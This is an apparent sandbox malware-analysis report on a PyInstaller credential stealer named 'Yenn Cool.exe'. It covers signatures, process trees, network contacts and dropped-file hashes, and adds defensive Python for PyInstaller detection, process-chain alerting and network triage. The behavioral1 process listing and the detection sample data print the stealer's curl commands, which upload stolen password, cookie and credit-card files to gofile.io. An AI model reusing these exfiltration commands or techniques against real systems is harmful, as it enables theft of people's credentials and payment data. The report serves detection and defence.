Malware Analysis Report

2024-12-07 17:35

Sample ID 241112-wvr7gsybnd
Target Yenn Cool.exe
SHA256 7050faa77423879af7a746ec4868ca467b26bcbc690c1f240a86ab5a8b01a591
Tags
pyinstaller credential_access discovery spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7050faa77423879af7a746ec4868ca467b26bcbc690c1f240a86ab5a8b01a591

Threat Level: Shows suspicious behavior

The file Yenn Cool.exe was classified as showing suspicious behavior.

Malicious Activity Summary

pyinstaller credential_access discovery spyware stealer

Drops startup file

Unsecured Credentials: Credentials In Files

Loads dropped DLL

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Browser Information Discovery

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

cURL User-Agent

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SetWindowsHookEx

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 18:14

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
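The static "Detects Pyinstaller" hit can be reproduced without the sandbox. A PyInstaller bundle carries a fixed trailer (the "cookie") at the end of the appended archive, and the dropped python311.dll under Files tells you which interpreter version to expect. The following is an added example, not sandbox or PyInstaller code: it parses the cookie layout that PyInstaller's own CArchiveReader uses and runs it over a constructed stub (the sample's bytes are not on this page).

```python
import struct

# Layout of the trailer ("cookie") that PyInstaller's bootloader appends to the
# archive, as read by PyInstaller's own CArchiveReader: 8-byte magic, archive
# length, TOC offset, TOC length, Python version (major*100 + minor) and the
# Python shared-library name padded to 64 bytes. 88 bytes in total.
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FORMAT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie if `data` carries a PyInstaller archive, else None.

    The cookie is the last thing in the archive, so the last occurrence of the
    magic bytes is the one to parse; earlier hits (e.g. inside embedded data)
    are ignored.
    """
    pos = data.rfind(COOKIE_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FORMAT, data[pos:pos + COOKIE_SIZE]
    )
    return {
        "cookie_offset": pos,
        "package_length": pkg_len,
        "toc_offset": toc_off,
        "toc_length": toc_len,
        "python_version": f"{pyver // 100}.{pyver % 100}",
        "python_lib": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def triage_file(path: str):
    """Read an executable from disk and run the cookie check on it."""
    with open(path, "rb") as fh:
        return find_pyinstaller_cookie(fh.read())


def build_fake_archive() -> bytes:
    """Constructed test input (not the sample's bytes): a stub PE body followed
    by a well-formed cookie claiming Python 3.11, matching the python311.dll
    the sample drops into its _MEI directory."""
    body = b"MZ" + b"\x00" * 510 + b"fake-pyinstaller-payload"
    toc_len = 24
    cookie = struct.pack(
        COOKIE_FORMAT, COOKIE_MAGIC, len(body) + COOKIE_SIZE,
        len(body) - toc_len, toc_len, 311, b"python311.dll",
    )
    return body + cookie


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        info = triage_file(sys.argv[1])
    else:
        info = find_pyinstaller_cookie(build_fake_archive())
    print("PyInstaller:", info or "not detected")
```

Run it against a real bundle with the path as the first argument; a parsed cookie with a python_lib matching the DLL the sample drops is a stronger indicator than the string "pyinstaller" alone, and the TOC offset is where an extractor would start unpacking the embedded .pyc modules.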

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-12 18:14

Reported

2024-11-12 18:18

Platform

win11-20241007-en

Max time kernel

147s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

This run detonated the compiled stealer module (cstealer.pyc) extracted from the sample rather than the packed executable. No handler is registered for .pyc files, so Windows launched OpenWith.exe (the "How do you want to open this file?" dialog); the registry-class and SetWindowsHookEx entries above come from OpenWith.exe and cmd.exe, not from the sample's own code, which is why this run shows none of the stealer behaviour seen in behavioral1 and behavioral2.

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 18:14

Reported

2024-11-12 18:17

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

112s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe N/A (42 identical rows)

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A (25 identical rows)

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A (2 identical rows)

Browser Information Discovery

discovery

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4768 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
PID 4768 wrote to memory of 4344 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe
PID 4344 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5076 wrote to memory of 928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4344 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 2252 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2252 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4344 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 4344 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe C:\Windows\system32\cmd.exe
PID 3844 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3844 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe

"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"

C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe

"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt""

C:\Windows\system32\curl.exe

curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt""

C:\Windows\system32\curl.exe

curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt""

C:\Windows\system32\curl.exe

curl -X POST "https://store2.gofile.io/contents/uploadfile" -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt"
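The process listings for behavioral1 and behavioral2, together with the "Drops startup file" signature, give two concrete detection opportunities: the living-off-the-land exfiltration chain (sample in %TEMP% -> cmd.exe -> built-in curl.exe POSTing a file=@ upload to gofile.io) and the copy of the executable into the per-user Startup folder. The following is an added example, not sandbox output or the sample's code: two detection rules run over process-creation and file-creation records in the shape a Sysmon-style telemetry source produces. The PIDs, images and command lines are copied from this report's behavioral1 run; the control event with PID 7001 and the FILE_SHARING_HOSTS set are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Exfiltration / staging hosts taken from this report's network and process
# listings; extend the set for your own environment.
FILE_SHARING_HOSTS = {"gofile.io", "discord.com", "rentry.co"}
USER_TEMP_MARKER = "\\appdata\\local\\temp\\"
STARTUP_MARKER = "\\start menu\\programs\\startup\\"

URL_RE = re.compile(r'https?://([^/:\s"]+)[^\s"]*')
UPLOAD_RE = re.compile(r'-F\s+"?file=@([^"\s]+)')


@dataclass
class ProcEvent:          # one process-creation record (Sysmon EID 1 style)
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class FileEvent:          # one file-creation record (Sysmon EID 11 style)
    pid: int
    image: str
    path: str


def ancestors(pid, procs):
    """Walk the parent chain of `pid` through a {pid: ProcEvent} map."""
    seen, cur = set(), procs.get(pid)
    while cur is not None and cur.ppid in procs and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = procs[cur.ppid]
        yield cur


def curl_upload_alerts(proc_events):
    """Rule 1: curl.exe POSTing a local file (-F file=@...) to a file-sharing host.

    Severity is 'high' when an ancestor runs from the user's Temp directory,
    the chain seen in this report (Yenn Cool.exe -> cmd.exe -> curl.exe).
    """
    procs = {p.pid: p for p in proc_events}
    alerts = []
    for p in proc_events:
        if not p.image.lower().endswith("\\curl.exe"):
            continue
        url, upload = URL_RE.search(p.cmdline), UPLOAD_RE.search(p.cmdline)
        if not (url and upload):
            continue
        host = url.group(1).lower()
        if not any(host == h or host.endswith("." + h) for h in FILE_SHARING_HOSTS):
            continue
        from_temp = any(USER_TEMP_MARKER in a.image.lower() for a in ancestors(p.pid, procs))
        alerts.append({"pid": p.pid, "host": host, "file": upload.group(1),
                       "severity": "high" if from_temp else "medium"})
    return alerts


def startup_drop_alerts(file_events):
    """Rule 2: a process running from Temp writes into the per-user Startup folder."""
    return [{"pid": f.pid, "path": f.path} for f in file_events
            if STARTUP_MARKER in f.path.lower() and USER_TEMP_MARKER in f.image.lower()]


# Constructed sample input: PIDs, images and command lines as listed for
# behavioral1 in this report, plus one benign curl invocation as a control.
YENN = r"C:\Users\Admin\AppData\Local\Temp\Yenn Cool.exe"
CMD = r"C:\Windows\system32\cmd.exe"
CURL = r"C:\Windows\system32\curl.exe"
UPLOAD = (r'curl -X POST "https://store2.gofile.io/contents/uploadfile" '
          r'-F "file=@C:\Users\Admin\AppData\Local\Temp\{}"')

SAMPLE_PROCS = [
    ProcEvent(4768, 1000, YENN, f'"{YENN}"'),
    ProcEvent(4344, 4768, YENN, f'"{YENN}"'),
    ProcEvent(2980, 4344, CMD, CMD + ' /c "ver"'),
    ProcEvent(5076, 4344, CMD, CMD + ' /c "' + UPLOAD.format("cspasswords.txt") + '"'),
    ProcEvent(928, 5076, CURL, UPLOAD.format("cspasswords.txt")),
    ProcEvent(2252, 4344, CMD, CMD + ' /c "' + UPLOAD.format("cscookies.txt") + '"'),
    ProcEvent(5004, 2252, CURL, UPLOAD.format("cscookies.txt")),
    ProcEvent(3844, 4344, CMD, CMD + ' /c "' + UPLOAD.format("cscreditcards.txt") + '"'),
    ProcEvent(3700, 3844, CURL, UPLOAD.format("cscreditcards.txt")),
    ProcEvent(7001, 7000, CURL, "curl https://intranet.example.test/health"),  # control, not in report
]
SAMPLE_FILES = [
    FileEvent(4344, YENN, r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yenn Cool.exe"),
    FileEvent(4344, YENN, r"C:\Users\Admin\AppData\Local\Temp\cspasswords.txt"),
]

if __name__ == "__main__":
    for a in curl_upload_alerts(SAMPLE_PROCS) + startup_drop_alerts(SAMPLE_FILES):
        print(a)
```

Rule 1 keys on the upload form (-F file=@) plus the destination host rather than on curl.exe alone, because curl ships with Windows 10/11 and is used legitimately; the parent-chain check is what separates this sample's use of it from an administrator's. Rule 2 is deliberately narrow (Temp-resident writer, Startup target) so that installers and shortcut creation do not trip it.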

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.75.40:443 rentry.co tcp
US 172.67.75.40:443 rentry.co tcp
US 172.67.75.40:443 rentry.co tcp
US 172.67.75.40:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 40.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 store2.gofile.io udp
FR 45.112.123.239:443 store2.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 r11.o.lencr.org udp
US 162.159.135.232:443 discord.com tcp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 126.123.112.45.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 239.123.112.45.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
N/A 127.0.0.1:49921 tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
FR 45.112.123.126:443 api.gofile.io tcp
N/A 127.0.0.1:49935 tcp
FR 45.112.123.239:443 store2.gofile.io tcp
FR 45.112.123.126:443 api.gofile.io tcp
FR 45.112.123.239:443 store2.gofile.io tcp
N/A 127.0.0.1:49939 tcp
FR 45.112.123.126:443 api.gofile.io tcp
FR 45.112.123.126:443 api.gofile.io tcp
FR 45.112.123.126:443 api.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 162.159.135.232:443 discord.com tcp
FR 45.112.123.126:443 api.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
FR 20.199.58.43:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
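The network table mixes the sample's own traffic with what any Windows 10/11 detonation produces on its own (DNS queries to the sandbox resolver, reverse PTR lookups, the Let's Encrypt OCSP responder, Microsoft telemetry, loopback sockets). Before these rows are turned into blocklist entries they need to be separated. The following is an added example, not part of the report: it parses rows in the table's own "Country Destination Domain Proto" layout and keeps only the contacts attributable to the sample. The noise classification (RESOLVER, BACKGROUND_SUFFIXES) is analyst judgement, the rows are a subset copied from the behavioral1 table, and the example-dns-only.test row is a constructed control that is not in the report.

```python
import re
from collections import defaultdict

# Subset of the behavioral1 Network table from this report, in its own
# "Country Destination Domain Proto" layout, plus one constructed control row
# (example-dns-only.test) that does not appear in the report.
SAMPLE_ROWS = """
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.75.40:443 rentry.co tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
FR 45.112.123.126:443 api.gofile.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 45.112.123.239:443 store2.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
GB 2.23.210.75:80 r11.o.lencr.org tcp
N/A 127.0.0.1:49921 tcp
FR 20.199.58.43:443 fd.api.iris.microsoft.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 example-dns-only.test udp
"""

# Analyst judgement, not sandbox output: traffic that the OS, the resolver or
# the TLS stack generates on its own and that must not end up in a blocklist.
RESOLVER = {"8.8.8.8"}
BACKGROUND_SUFFIXES = (".in-addr.arpa", ".lencr.org", ".microsoft.com")

ROW_RE = re.compile(
    r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$"
)


def parse_rows(text):
    """Parse table rows; the Domain column is optional (loopback rows lack it)."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def is_background(row):
    if row["ip"].startswith("127.") or row["ip"] in RESOLVER:
        return True                      # loopback, or a DNS query to the resolver
    return (row["domain"] or "").endswith(BACKGROUND_SUFFIXES)


def sample_contacts(rows):
    """Return {domain: sorted 'ip:port' endpoints} for traffic attributable to the sample."""
    out = defaultdict(set)
    for r in rows:
        if is_background(r):
            continue
        out[r["domain"] or r["ip"]].add(f'{r["ip"]}:{r["port"]}')
    return {d: sorted(v) for d, v in sorted(out.items())}


def dns_only_domains(rows):
    """Domains the sample resolved but never connected to (blocked, dead, or a fallback)."""
    resolved = {r["domain"] for r in rows if r["ip"] in RESOLVER and r["domain"]}
    connected = {r["domain"] for r in rows if r["ip"] not in RESOLVER and r["domain"]}
    return sorted(d for d in resolved - connected if not d.endswith(BACKGROUND_SUFFIXES))


if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_ROWS)
    for domain, endpoints in sample_contacts(parsed).items():
        print(f"{domain:28s} {', '.join(endpoints)}")
    print("resolved only:", dns_only_domains(parsed))
```

On the report's rows this leaves six domains (rentry.co, api.ipify.org, api.gofile.io, store2.gofile.io, geolocation-db.com, discord.com). Note that three of them are legitimate public services abused by the sample, so blocking by domain affects real users; the cURL User-Agent plus the gofile.io upload path from the process listing is the more precise network-side indicator.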

Files

C:\Users\Admin\AppData\Local\Temp\_MEI47682\python311.dll

MD5 58e01abc9c9b5c885635180ed104fe95
SHA1 1c2f7216b125539d63bd111a7aba615c69deb8ba
SHA256 de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837
SHA512 cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

C:\Users\Admin\AppData\Local\Temp\_MEI47682\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

C:\Users\Admin\AppData\Local\Temp\_MEI47682\base_library.zip

MD5 1df66a5a8d8c7bc333ed59a827e131e3
SHA1 614986f57b9922cedf4df5ebadaa10ea307d46d1
SHA256 190afb1aa885c2aa3516ab343e35f6b10472f4314492c8c4492c7d0f2add2f80
SHA512 6568af0d41b1d2f1d4a75e25705777ec263c4a903db164923f4a10118218270a2b003f16f39ae238fe71f0dc1ad52d0cc1ac93a7bf2c6643d009f825dd00e1aa

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_ctypes.pyd

MD5 6114277c6fc040f68d25ca90e25924cd
SHA1 028179c77cb3ba29cd8494049421eaa4900ccd0e
SHA256 f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656
SHA512 76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

C:\Users\Admin\AppData\Local\Temp\_MEI47682\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_lzma.pyd

MD5 737119a80303ef4eccaa998d500e7640
SHA1 328c67c6c4d297ac13da725bf24467d8b5e982e3
SHA256 7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28
SHA512 1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_socket.pyd

MD5 64a6c475f59e5c57b3f4dd935f429f09
SHA1 ca2e0719dc32f22163ae0e7b53b2caadb0b9d023
SHA256 d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49
SHA512 cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

C:\Users\Admin\AppData\Local\Temp\_MEI47682\select.pyd

MD5 653bdccb7af2aa9ccf50cb050fd3be64
SHA1 afe0a85425ae911694c250ab4cb1f6c3d3f2cc69
SHA256 e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279
SHA512 07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_bz2.pyd

MD5 4438affaaa0ca1df5b9b1cdaa0115ec1
SHA1 4eda79eaf3de614d5f744aa9eea5bfcf66e2d386
SHA256 ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85
SHA512 6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_queue.pyd

MD5 8bbed19359892f8c95c802c6ad7598e9
SHA1 773fca164965241f63170e7a1f3a8fa17f73ea18
SHA256 4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065
SHA512 22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_ssl.pyd

MD5 a0b40f1f8fc6656c5637eacacf7021f6
SHA1 38813e25ffde1eee0b8154fa34af635186a243c1
SHA256 79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1
SHA512 c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

C:\Users\Admin\AppData\Local\Temp\_MEI47682\libcrypto-3.dll

MD5 7a6a8c2a8c379b111cdceb66b18d687d
SHA1 f3b8a4c731fa0145f224112f91f046fddf642794
SHA256 8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b
SHA512 f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5

C:\Users\Admin\AppData\Local\Temp\_MEI47682\libssl-3.dll

MD5 64acb046fe68d64ee475e19f67253a3c
SHA1 d9e66c9437ce6f775189d6fdbd171635193ec4cc
SHA256 b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10
SHA512 f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_overlapped.pyd

MD5 ac053ef737e4f13b02bfa81f9e46170b
SHA1 5d8ebeb30671b74d736731696fedc78c89da0e1f
SHA256 cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f
SHA512 6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e

C:\Users\Admin\AppData\Local\Temp\_MEI47682\pyexpat.pyd

MD5 cdcf0e74a32ad7dfeda859a0ce4fcb20
SHA1 c72b42a59ba5d83e8d481c6f05b917871b415f25
SHA256 91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197
SHA512 c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI47682\_hashlib.pyd

MD5 1524882af71247adecf5815a4e55366a
SHA1 e25014c793c53503bdff9af046140edda329d01b
SHA256 6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327
SHA512 5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

C:\Users\Admin\AppData\Local\Temp\_MEI47682\unicodedata.pyd

MD5 1905b5d0f945499441e8cd58eb123d86
SHA1 117e584e6fcc0e8cfc8e24e3af527999f14bac30
SHA256 b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532
SHA512 ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

